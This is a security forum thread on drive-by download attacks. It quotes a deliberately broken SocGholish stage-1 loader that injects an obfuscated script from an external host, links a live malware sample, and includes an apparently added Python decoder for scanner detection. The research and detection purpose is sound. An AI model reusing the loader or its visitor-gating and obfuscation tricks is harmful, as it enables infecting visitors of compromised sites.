Drive-By Download attacks


imlordofthering

Hey all - I am doing some research on some groups that are focused on drive-by download attacks. Scenarios in which a user visits a trusted domain and gets a popup or notification that tells them things like "Your computer is infected" or "Your browser version is out of date".

I have three questions that I hope the community can help me with:

1.) I've seen some attacks where a user will enable notifications for a specific website and then will get very scary Windows notifications (example) -- what is the mechanism that pushes this notification through Chrome and into the Windows Notification Center? I am assuming it is JavaScript, but I'd love some technical resources to explain how to emulate that attack.

2.) I'm tracking a few SocGholish 'FakeUpdates' attacks, and if anyone sees instances of this in the wild I would love to see them. I've got a scanner (GitHub link) that I am extending from another researcher to find these and decode them on my own, and any help would be greatly appreciated!

3.) How are these trusted sites getting these malicious javascript stagers on them? Supply chain compromise? Bad WordPress plugins? Credential theft? I don't know how to answer this on my own and some insight would be helpful.


1.) Read up on Cryxos trojans. These are pretty much exactly what you're describing, and yes they do typically use javascript. 

2.) https://malshare.com/sample.php?action=detail&hash=fe4f25543277d59a8be80dca68c50d09e695ad60d732ec4e7a8086bddf77cb5b here is a sample of SocGholish I found myself personally. This is malware so please use caution if you download it.

3.) Multiple ways. WordPress plugins are often a big culprit. There was a massive JS injection campaign earlier this year going by NDSW or NDSX (variable names used in the JS) that might help give you some insights. Read more here: https://blog.sucuri.net/2022/06/analysis-massive-ndsw-ndsx-malware-campaign.html


8 minutes ago, ChickenKing said:

1.) Read up on Cryxos trojans. These are pretty much exactly what you're describing, and yes they do typically use javascript. 

2.) https://malshare.com/sample.php?action=detail&hash=fe4f25543277d59a8be80dca68c50d09e695ad60d732ec4e7a8086bddf77cb5b here is a sample of SocGholish I found myself personally. This is malware so please use caution if you download it.

3.) Multiple ways. WordPress plugins are often a big culprit. There was a massive JS injection campaign earlier this year going by NDSW or NDSX (variable names used in the JS) that might help give you some insights. Read more here: https://blog.sucuri.net/2022/06/analysis-massive-ndsw-ndsx-malware-campaign.html

Thanks for sharing. What I'm looking for in particular with the SocGholish right now is not their payload, but the element on the webpage itself that triggers the download.

For example (intentionally broken for safety), here is one I found in the wild that the scanner I'm working with can pick up with regex:

(funcXXXXXXtion () { var oi = document.referrer; var fb = window.location.href; var gy = navigator.userAgent; var sq = new RegExp(bz('l:b/x/x(t[v^b/z]i+d)c/t')); if (!oi || fb.match(sq)[1] == oi.match(sq)[1] || gy.indexOf(bz('rWrienudoolwisj')) == -1 || window.localStorage[bz('z_q_w_tuutqmhai')]) { return; } var cx = bz('fsycdrkizpqtt'); var fe = document.createElement(cx); fe.async = true; fe.<XXXXXsrc> = bz('ahststqpqsk:s/z/kakucchtjirosnx.fwqofnwdlewrlwrobmdacntqpuniglftksu.pcmonmo/yrheapsosrktv?wrn=pdejs1miiZojuctzdNizogkxtMqjoUj1jNp2jYtxgNajpgxznMyDyIv2jMvyaZojvaxWzQa9qMgjvYd5i'); var sg = document.getElementsByTagName(cx)[0]; sg.parentNode.insertBefore(fe, sg); function bz(ft) { var sw = ''; for (var vn = 0; vn < ft.length; vn++) { if (vn % 2) { sw += ft[vn]; } } return sw; }a }());


My goal is to extend my scanner to be able to pick up more instances of compromised sites and to identify if there are other variations of this stage-1 script to look for.

In regard to your point three - I am actually working on deciphering what must be a variant of that exact campaign that I found in the wild this week - the code instead begins with

if (ndsj === undefined) {

but matches all of the TTPs in that article. Thanks for helping me attribute that one!

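As an added example (my own code, not the thread's or the linked scanner's), here is a decoder for the odd-index string obfuscation the stage-1 snippet above uses, so a scanner can match on the recovered strings ("Windows", "___utma", "script") rather than on the raw text; the decoder name is recovered from the function definition, so it also handles variants that rename bz, and the loader URL in the sample is a constructed placeholder.

```python
import re

# Added example (not code from the thread): decode the odd-index string
# obfuscation used by the quoted SocGholish stage-1 loader, so a scanner can
# compare recovered strings instead of matching only the raw obfuscated text.

def decode_odd_index(s: str) -> str:
    """Mirror of the loader's bz(): keep every character at an odd index."""
    return s[1::2]

def encode_odd_index(s: str, pad: str = "x") -> str:
    """Inverse of decode_odd_index, used here only to build sample input."""
    return "".join(pad + c for c in s)

# The decoder is declared as `function NAME(arg) { ... % 2 ... }`; recover NAME
# so the extractor does not depend on the literal name `bz`.
DECODER_DEF = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{[^}]*%\s*2\b")

def find_decoder_name(js: str):
    m = DECODER_DEF.search(js)
    return m.group(1) if m else None

def decode_strings(js: str) -> dict:
    """Map each string literal passed to the decoder to its decoded form."""
    name = find_decoder_name(js)
    if name is None:
        return {}
    calls = re.findall(re.escape(name) + r"\(\s*'([^']*)'\s*\)", js)
    return {enc: decode_odd_index(enc) for enc in calls}

# Constructed sample: the non-URL literals are the ones quoted in the thread;
# the loader URL is a placeholder encoded the same way, not the real one.
PLACEHOLDER_URL = encode_odd_index("https://example.invalid/loader.js")
SAMPLE = (
    "(function () { var sq = new RegExp(bz('l:b/x/x(t[v^b/z]i+d)c/t'));"
    " if (gy.indexOf(bz('rWrienudoolwisj')) == -1"
    " || window.localStorage[bz('z_q_w_tuutqmhai')]) { return; }"
    " var cx = bz('fsycdrkizpqtt'); var fe = document.createElement(cx);"
    " fe.async = true; fe.src = bz('" + PLACEHOLDER_URL + "');"
    " function bz(ft) { var sw = ''; for (var vn = 0; vn < ft.length; vn++)"
    " { if (vn % 2) { sw += ft[vn]; } } return sw; } }());"
)

if __name__ == "__main__":
    for enc, dec in decode_strings(SAMPLE).items():
        print(f"{enc!r:45} -> {dec!r}")
```

The decoded "___utma" check and the "Windows" user-agent test are the gating conditions the loader applies before it injects the script tag, which is what makes them useful as detection features.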

26 minutes ago, imlordofthering said:

Thanks for sharing. What I'm looking for in particular with the SocGholish right now is not their payload, but the element on the webpage itself that triggers the download.
 

This really depends on the site. From my experience SocGholish does not use compromised sites but instead uses typosquatting or fake sites for legit software. In those cases (which are the majority) it's just simply malware hosted on a site. Nothing special.


So from what I could remember about SocGholish, in the past they embedded the base64-encoded zip archive within the lure page itself. After some changes in August of 2022 they started using a second stage of JS that was delivered from an external site after the user interacted with the page. This would then deliver the zip archive.

I haven't seen SocGholish in a while, but if I come across any campaigns soon I'll share what I find.


1. https://developer.mozilla.org/en-US/docs/Web/API/Notifications_API/Using_the_Notifications_API

2. That is what I have seen a lot with those fake notifications. https://github.com/mrd0x/BITB

3. The most classic form of those notifications are stupid news pages that make a buck with advertisement. The ad company selling the ads does not give a damn about the quality of the ads. That's how phishing pages land there.
